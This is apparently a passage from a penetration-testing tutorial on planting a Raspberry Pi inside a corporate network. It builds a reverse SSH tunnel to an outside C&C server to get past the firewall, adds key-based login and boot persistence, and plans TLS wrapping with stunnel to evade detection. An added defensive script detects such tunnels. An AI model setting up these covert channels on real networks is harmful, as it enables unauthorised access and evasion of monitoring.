
Setting up a reverse SSH tunnel

Now that SSH is working on both hosts, we need to set up the reverse SSH tunnel. Taking a look at the following figure showing a simplified topology, there is a pretty big problem here that justifies why we need to set up a reverse SSH tunnel:

Do you see it? Well, in case you don't, the issue is that our internal Raspberry Pi server is not reachable externally, since the corporate firewall is blocking it. There are no inbound rules or NAT policies in place to handle this sort of connection. So I have no issues connecting to the C&C server; however, I will need the C&C server to connect back to the Raspberry Pi. So, how do we do this? Well, this is where a reverse SSH tunnel comes in.

What a reverse SSH tunnel allows us to do is set up a persistent tunnel, initiated from the inside host to the C&C server with the -R flag and a predefined port. Because of this flag, when you SSH on the C&C server to itself on that predefined port, you piggyback off the already established tunnel and land on the inside host.

In the following figure, you can see how the reverse SSH tunnel works to solve our issue:

Based on the preceding figure, here is my configuration for setting up the reverse SSH tunnel:

  1. On the Raspberry Pi (my internal box), connect to the outside C&C server with the -R flag as well as the port you plan to use as the redirection port:
ssh -R 8022:localhost:22 mycandcserver.mydomain.com
  2. Now, to reference this tunnel on the C&C server, you will just run this command and will be seamlessly connected to your internal server without any firewalls or NAT rules added:
ssh -p 8022 localhost
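From the defender's side, the tunnel above leaves a visible trace on the C&C-side host: the sshd process serving the inbound session binds the -R port (8022 here) as a listening socket, which `ss -tlnp` shows. The following script is an added example (not from the original text) that flags sshd listeners on any port other than the service port; the `ss` output it parses is constructed, and the service port and the function name are assumptions.

```shell
#!/bin/sh
# Added example: spot listening sockets held by sshd on ports other than the
# real service port. A remote forward (ssh -R 8022:localhost:22 ...) makes sshd
# listen on 8022 on the receiving host, which `ss -tlnp` exposes. Any header
# line in the ss output is ignored, since only lines naming sshd are examined.

SSHD_PORT=22   # assumption: the port sshd is actually configured to serve

# Print "<local address:port> <pid>" for every sshd listener not on SSHD_PORT.
# $1: text in `ss -tlnp` format.
find_remote_forwards() {
    printf '%s\n' "$1" | awk -v svc="$SSHD_PORT" '
        /users:\(\("sshd"/ {
            # Column 4 is Local Address:Port, e.g. 127.0.0.1:8022 or [::1]:8022;
            # the port is whatever follows the last colon.
            n = split($4, parts, ":")
            port = parts[n]
            if (port != svc) {
                match($0, /pid=[0-9]+/)
                print $4, substr($0, RSTART + 4, RLENGTH - 4)
            }
        }'
}

# Constructed sample: the normal sshd listeners on 22, one extra sshd listener
# on 127.0.0.1:8022 created by a remote forward, and an unrelated cupsd socket.
SS_OUTPUT='State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=612,fd=3))
LISTEN 0 128 127.0.0.1:8022 0.0.0.0:* users:(("sshd",pid=2310,fd=9))
LISTEN 0 128 [::]:22 [::]:* users:(("sshd",pid=612,fd=4))
LISTEN 0 4096 127.0.0.1:631 0.0.0.0:* users:(("cupsd",pid=501,fd=7))'

# Live use on a real host (needs root to see process names): find_remote_forwards "$(ss -tlnp)"
find_remote_forwards "$SS_OUTPUT"
```

The pid it prints belongs to the sshd child serving the tunnel-holding session, so it can be matched against the login record to see which account opened the forward.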

Everything works as tested, great! However, we are not quite done yet. There is one more catch. What happens if your Raspberry Pi reboots? You will have to console back in and reconnect that tunnel to your C&C server. To prevent this problem from occurring, you will need to automate tunnel creation on startup. The one issue with automating the preceding commands is that the session is typically interactive and needs a password input. To overcome this, you will use a key-based authentication setup:

  1. Generate a key pair on the inside server, that is, the server that will be initiating the SSH session. Make sure that you generate the key as the user you plan to log in as:
  2. Log into the C&C server, and navigate to the root of the home directory. Create a .ssh directory if one does not exist.
  3. Within this .ssh directory, copy the id_rsa.pub file that was just created on the inside server to the .ssh directory on the C&C server.
  4. Once this is complete, it is time to test it. Log onto your inside server, in my case, the Raspberry Pi. Now, ssh to your C&C server. You should be asked whether you want to continue the first time so you can accept the key. After selecting yes, you should be logged in without being prompted for a password. Log out and try the SSH session again. You should be able to get right into the C&C server without any input:

Now that we have the SSH tunnels built and working without any input, we want to work on hiding all this traffic within a TLS tunnel. There are lots of security devices that may filter SSH outbound or may raise some additional flags. Fortunately, SSL/TLS is typically allowed through firewalls, so having the traffic flow through an SSL/TLS tunnel would be an added bonus. Luckily, stunnel is a great utility to use for this purpose. Let me demonstrate how I can set up stunnel and get it working before we tie it all together. But before we get to stunnel, we have to make sure that our SSH connection will launch on startup so that we can reverse-SSH at any time:

  1. First, let's navigate to the if-up.d directory. I will create a file in that directory that will execute on startup. I will call this file outbound-ssh, and make sure that it's executable (chmod +x). Finally, I will edit the file. In my case, I will be using vi:
  2. Then, I just need to create the script within the file that will execute:
  3. There are lots of options in terms of how to get this script to run on boot. I insert the command in /etc/rc.local so that it runs on startup. I just call the script as-is:
/root/outbound-ssh